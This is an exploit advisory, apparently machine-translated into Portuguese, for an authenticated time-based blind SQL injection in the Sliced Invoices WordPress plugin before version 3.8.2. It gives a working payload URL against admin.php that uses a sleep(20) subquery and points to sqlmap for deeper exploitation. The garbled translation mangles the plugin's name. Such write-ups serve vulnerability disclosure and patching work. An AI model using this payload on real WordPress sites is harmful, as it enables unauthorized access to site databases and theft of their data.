Faturas cortadas do WordPress 3.8.2 – Injeção de SQL ‘pós’

# Exploit Title: Faturas em fatias do WordPress 3.8.2 – Injeção de SQL ‘pós’
# Data: 2019-10-22
# Exploit Autor: Lucian Ioan Nitescu
# Contato: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Página inicial do fornecedor: https://slicedinvoices.com/
# Link do software: https://wordpress.org/plugins/sliced-invoices/
# Versão: 3.8.2
# Testado em: Ubuntu 18.04 / WordPress 5.3

# 1. Descrição:
# O plugin WordPress Invoices Fatiado com uma versão inferior a 3.8.2 é afetado
# por uma vulnerabilidade de injeção SQL autenticada.

# 2. Prova de conceito:
# Injeção SQL autenticada:
– Usando um usuário do WordPress, acesse <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)–%20
– A resposta será retornada após 20 segundos, comprovando a exploração bem-sucedida da vulnerabilidade.
– O sqlmap pode ser usado para explorar ainda mais a vulnerabilidade.